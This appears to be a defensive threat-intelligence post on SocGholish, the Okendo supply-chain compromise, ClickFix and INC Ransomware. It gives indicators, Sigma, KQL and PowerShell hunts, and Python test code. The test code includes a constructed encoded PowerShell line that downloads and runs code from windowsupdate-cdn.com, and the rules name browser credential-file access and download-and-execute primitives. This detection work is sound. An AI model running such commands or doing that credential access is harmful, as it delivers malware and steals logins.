
SocGholish Disruption & SmartRAT Supply Chain Surge: OTX Pulse Analysis — Credential Theft & Ransomware

Security Arsenal Team
June 18, 2026
6 min read

Executive Summary

Recent OTX Pulse data from June 2026 indicates a volatile threat landscape where law enforcement disruption of legacy infrastructure (SocGholish/Operation Endgame) has been met with immediate innovation by threat actors. We are observing a surge in AI-generated ClickFix campaigns and supply chain compromises (Okendo Reviews) serving as primary vectors for InfoStealers (LummaC2, ACRStealer) and Remote Access Trojans (SmartRAT, NetSupport). These initial access vectors are directly fueling the rise of INC Ransomware, which has aggressively filled the void left by LockBit and BlackCat, utilizing rewritten Rust-based encryptors and Cobalt Strike beacons for lateral movement.

Threat Actor / Malware Profile

Primary Vectors & Malware

  • SocGholish (Fake Updates): Despite Operation Endgame disrupting TA569 (GOLD PRELUDE) and taking down 106 servers, residual hostnames and the tactic of fake browser updates remain high-risk for drive-by downloads delivering IcedID, Pikabot, and QakBot.
  • SmartApeSG (Supply Chain): Leverages the compromised Okendo Reviews widget (okendo-reviews.js) to inject malicious JavaScript that acts as a loader for SmartRAT and NetSupport, giving the actor long-term persistence in retail environments.
  • ClickFix (AI-Generated): A campaign targeting Brazilian finance sectors using typosquatting (e.g., crefisa.online) and fake CAPTCHAs to trick users into running PowerShell scripts that deploy SmartRAT and Banana RAT.
  • INC Ransomware: A top-tier RaaS operation (2026) utilizing Rust-based cross-platform encryptors. Affiliates use Cobalt Strike and credential theft (via stealers) to move laterally before encryption.

Attack Chain

  1. Initial Access: Compromised WordPress sites (SocGholish), Malicious JS Injection (Okendo), or Typosquatting domains (ClickFix).
  2. Execution: User interaction with fake updates/captchas triggers PowerShell or JScript to download payloads.
  3. Persistence: Deployment of InfoStealers (LummaC2, AgentTesla) to harvest session cookies and credentials, or RATs (SmartRAT) for hands-on-keyboard access.
  4. Lateral Movement: Valid credentials are used to deploy Cobalt Strike beacons.
  5. Impact: Deployment of INC Ransomware encryptors for double-extortion.

IOC Analysis

SOC teams should prioritize the following indicators extracted from the live pulses:

  • Hostnames (Compromised Infrastructure): trademark.iglesiaelarca.com, promo.summat10n.org. These are WordPress sites hijacked to host SocGholish payloads.
  • Domains (C2 & Typosquatting): windowsupdate-cdn.com (Fake update/ClickFix), incblog.su (INC Ransomware), wigletticks.com (Okendo C2).
  • File Hashes: Multiple MD5 and SHA256 hashes associated with SmartRAT, LummaC2, and INC payloads. These should be blocked in EDR solutions.
  • URLs: Specific endpoints for the Okendo supply chain attack (http://cdn-static.okendo.io/reviews-widget-plus/js/okendo-reviews.js). Note: While the domain is legitimate, this specific path was weaponized.

Detection Engineering

Sigma Rules

YAML
title: Potential SocGholish Fake Browser Update Activity
id: 485c0b9c-6b3a-4b3f-9c7d-1c0e5e7e1e1f
description: Detects potential SocGholish activity via fake browser update scripts often spawned by browser processes.
status: experimental
date: 2026/06/19
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/614a8f9c7c8e0f0b8c7e1e1f
tags:
    - attack.initial_access
    - attack.t1189
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith:
            - '\chrome.exe'
            - '\firefox.exe'
            - '\msedge.exe'
        Image|endswith:
            - '\mshta.exe'
            - '\powershell.exe'
            - '\cmd.exe'
            - '\wscript.exe'
        CommandLine|contains:
            - 'update'
            - 'install'
            - 'browser'
    condition: selection
falsepositives:
    - Legitimate software updates initiated by browser
level: high
---
title: SmartRAT ClickFix PowerShell Execution
id: 615c0b9c-6b3a-4b3f-9c7d-1c0e5e7e1e20
description: Detects PowerShell execution patterns associated with ClickFix campaigns (Fake Captcha/BSOD) often using encoded commands.
status: experimental
date: 2026/06/19
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/614a8f9c7c8e0f0b8c7e1e20
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_powershell:
        Image|endswith: '\powershell.exe'
        CommandLine|contains:
            - 'FromBase64String'
            - 'DownloadString'
            - 'IEX'
    selection_suspicious_context:
        CommandLine|contains:
            - 'captcha'
            - 'bsod'
            - 'windowsupdate'
            - 'cdn'
    condition: all of selection_*
falsepositives:
    - Administrative scripts
level: critical
---
title: InfoStealer Browser Credential Access
id: 715c0b9c-6b3a-4b3f-9c7d-1c0e5e7e1e21
description: Detects processes accessing browser credential files, a common behavior of LummaC2, Vidar, and RedLine.
status: experimental
date: 2026/06/19
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/614a8f9c7c8e0f0b8c7e1e21
tags:
    - attack.credential_access
    - attack.t1555.003
logsource:
    category: file_access
    product: windows
detection:
    selection:
        TargetFilename|contains:
            - '\Google\Chrome\User Data\Default\Login Data'
            - '\Mozilla\Firefox\Profiles\'
            - '\AppData\Local\BraveSoftware'
    filter_legit:
        Image|endswith:
            - '\chrome.exe'
            - '\firefox.exe'
            - '\brave.exe'
    condition: selection and not filter_legit
falsepositives:
    - Backup software accessing browser data
level: high
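As an added example that is not part of the original post, the following Python evaluates the logic of the first two Sigma rules above over constructed process-creation events. It also decodes a -EncodedCommand payload before matching, because a base64-wrapped ClickFix command hides IEX and DownloadString from plain substring checks; the field names, sample paths and lure text are assumptions.

```python
import base64
import re

# Constructed sample process-creation events (not taken from the OTX pulses);
# the field names mirror the Sigma process_creation logsource used above.
ENCODED_LURE = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://windowsupdate-cdn.com/captcha')"
    .encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Users\u\Downloads\Chrome-Update.js"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + ENCODED_LURE},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\notepad.exe",
     "CommandLine": "notepad.exe incident-notes.txt"},
]
BROWSERS = ("\\chrome.exe", "\\firefox.exe", "\\msedge.exe")
SCRIPT_HOSTS = ("\\mshta.exe", "\\powershell.exe", "\\cmd.exe", "\\wscript.exe")
UPDATE_WORDS = ("update", "install", "browser")
PS_PRIMITIVES = ("frombase64string", "downloadstring", "iex")
CLICKFIX_CONTEXT = ("captcha", "bsod", "windowsupdate", "cdn")
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

def expand_command_line(cmdline):
    """Append the decoded -EncodedCommand payload (UTF-16LE base64), if any,
    so the substring checks see what PowerShell will actually run."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline

def matches_socgholish(ev):
    """Rule 1: a browser spawning a script host with an update-themed command."""
    return (ev["ParentImage"].lower().endswith(BROWSERS)
            and ev["Image"].lower().endswith(SCRIPT_HOSTS)
            and any(w in ev["CommandLine"].lower() for w in UPDATE_WORDS))

def matches_clickfix(ev):
    """Rule 2: PowerShell download/exec primitives plus ClickFix lure context."""
    cmd = expand_command_line(ev["CommandLine"]).lower()
    return (ev["Image"].lower().endswith("\\powershell.exe")
            and any(p in cmd for p in PS_PRIMITIVES)
            and any(c in cmd for c in CLICKFIX_CONTEXT))
```

Without the decoding step the second sample event would not trip the ClickFix rule, because none of its keywords appear in the raw command line.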

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for ClickFix and Typosquatting domains in Network Events
DeviceNetworkEvents
| where Timestamp > ago(7d)
// has_any rather than 'in': RemoteUrl may carry a full URL, and 'in' only matches the bare domain exactly
| where RemoteUrl has_any (
    'crefisa.online',
    'windowsupdate-cdn.com',
    'wigletticks.com',
    'wizzleticks.com',
    'incblog.su',
    'comples.biz',
    'dafkov.shop'
)
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP

// Hunt for Suspicious PowerShell Execution associated with Fake Updates
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName =~ 'powershell.exe'
| where ProcessCommandLine has_any ('FromBase64String', 'DownloadString', 'IEX')
| where ProcessCommandLine has_any ('update', 'captcha', 'bsod')
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName

PowerShell Hunt Script

PowerShell
# IOC Hunt for SmartRAT and SocGholish Indicators
# Checks DNS Cache and Hosts file for malicious domains

$MaliciousDomains = @(
    'crefisa.online',
    'windowsupdate-cdn.com',
    'wigletticks.com',
    'wizzleticks.com',
    'incblog.su',
    'trademark.iglesiaelarca.com',
    'content.garretttrails.org',
    'promo.summat10n.org',
    'billing.roofnrack.us',
    'api-app.uppercrafteroom.com'
)

Write-Host "[+] Checking DNS Cache for Malicious Domains..." -ForegroundColor Cyan
# Get-DnsClientCache is available on Windows 8 / Server 2012 and later
$DnsCache = Get-DnsClientCache
foreach ($Domain in $MaliciousDomains) {
    # $Matches is a PowerShell automatic variable, so a distinct name is used here
    $Hits = $DnsCache | Where-Object { $_.Entry -like "*$Domain*" }
    if ($Hits) {
        Write-Host "[!] FOUND: $Domain in DNS Cache" -ForegroundColor Red
        $Hits | Format-List Entry, Data, Type
    }
}

Write-Host "[+] Checking Hosts File for Malicious Domains..." -ForegroundColor Cyan
$HostsPath = "$env:SystemRoot\System32\drivers\etc\hosts"
if (Test-Path $HostsPath) {
    $HostsContent = Get-Content $HostsPath
    foreach ($Domain in $MaliciousDomains) {
        # Escape the domain so '.' matches literally instead of acting as a regex wildcard
        $Pattern = [regex]::Escape($Domain)
        $Found = $HostsContent | Where-Object { $_ -notmatch '^\s*#' -and $_ -match $Pattern }
        if ($Found) {
            Write-Host "[!] FOUND: $Domain in Hosts File" -ForegroundColor Red
            $Found | ForEach-Object { Write-Host "    $_" }
        }
    }
}

Write-Host "[+] Hunt Complete." -ForegroundColor Green

Response Priorities

  • Immediate:
    • Block all IOCs (domains, hostnames, IPs) at the perimeter and proxy.
    • Investigate systems communicating with wigletticks.com or windowsupdate-cdn.com.
    • Isolate devices showing signs of encoded PowerShell execution (FromBase64String) spawned by browser processes.
  • 24 Hours:
    • Conduct credential auditing for users on affected devices. If InfoStealers (LummaC2, AgentTesla) were executed, assume credentials are compromised and force password resets.
    • Review e-commerce platforms for the Okendo widget compromise; verify JS integrity.
  • 1 Week:
    • Implement application control to block mshta.exe and wscript.exe from browser processes.
    • Update supply chain security policies to verify the integrity of third-party JavaScript widgets (e.g., Subresource Integrity checks).
    • Enhance user awareness training regarding "Fake Browser Updates" and "Fake CAPTCHA" social engineering tactics.
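The widget integrity check from the 24-hour and 1-week items above, as an added example that is not code from the original post or from Okendo: it audits a storefront page for third-party scripts that carry no integrity attribute, computes the Subresource Integrity token that pins a reviewed copy of the script, and flags drift when a re-fetched body no longer matches. The HTML fragment, hostnames and script bodies are constructed.

```python
import base64
import hashlib
import re
from urllib.parse import urlparse

# Constructed storefront fragment (not a real deployment); the widget URL is the
# one named in the IOC section, the script bodies below are stand-ins.
SAMPLE_HTML = """
<script src="/assets/app.js"></script>
<script src="http://cdn-static.okendo.io/reviews-widget-plus/js/okendo-reviews.js"></script>
<script src="https://cdn.example.net/lib.js" integrity="sha384-abc" crossorigin="anonymous"></script>
"""
BASELINE_BODY = b"(function(){window.OkendoReviews={render:function(){}}})();\n"
TAMPERED_BODY = BASELINE_BODY + b"/* constructed: extra code appended after the review */\n"
SCRIPT_RE = re.compile(r"<script\b([^>]*)>", re.I)
ATTR_RE = re.compile(r'(\w+)\s*=\s*"([^"]*)"')

def sri_token(body, algo="sha384"):
    """SRI value for a script body: '<algo>-<base64 digest>'."""
    return f"{algo}-{base64.b64encode(hashlib.new(algo, body).digest()).decode()}"

def unpinned_third_party_scripts(html, first_party_host):
    """List external <script src> URLs that carry no integrity attribute."""
    found = []
    for m in SCRIPT_RE.finditer(html):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(m.group(1))}
        host = urlparse(attrs.get("src", "")).hostname
        if host and host != first_party_host and "integrity" not in attrs:
            found.append(attrs["src"])
    return found

def check_drift(body, pinned_token):
    """Re-hash a freshly fetched body with the pinned algorithm. A mismatch means
    the third party changed the file (benign release or compromise); the pinned
    tag now blocks it, so the change needs review rather than a silent re-pin."""
    algo = pinned_token.split("-", 1)[0]
    current = sri_token(body, algo)
    return current == pinned_token, current
```

SRI only protects scripts the page loads directly with a pinned script tag; a widget that fetches further code at runtime still needs its own review.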
